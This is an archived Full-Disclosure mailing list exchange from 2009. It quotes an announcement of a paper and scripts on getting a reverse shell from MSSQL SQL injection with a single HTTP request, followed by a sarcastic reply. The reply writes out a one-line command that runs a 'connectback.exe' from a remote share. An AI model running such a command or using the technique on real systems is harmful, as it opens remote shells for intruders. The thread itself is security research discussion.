|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Fredrick Diggle (fdiggle
gmail.com)
Date: Sun Jul 05 2009 - 23:22:22 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Or just
'start \\DiggleSec.com\fredrick\connectback.exe'
would have also been acceptable.
But Fredrick is sure that your 20 page write-up was fantastically entertaining.
On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruhmavituna.com> wrote:
> This is a different and more practical approach to get a reverse shell
> or code execution in SQL Injections (particularly in MSSQL). The idea
> is simple. Getting a reverse shell from an SQL Injection with one HTTP
> request without using an extra channel such as TFTP, FTP to upload the
> initial payload.
>
> White paper explains the steps and the details of the attack. Scripts
> got all the tools you need to create your HTTP request with your own
> payload.
>
>
> White Paper:
> http://ferruh.mavituna.com/papers/oneclickownage.pdf
>
> Scripts:
> http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
>
> Presentation (IT Underground 2009):
> http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>
>
>
> Regards,
>
>
> --
> http://ferruh.mavituna.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]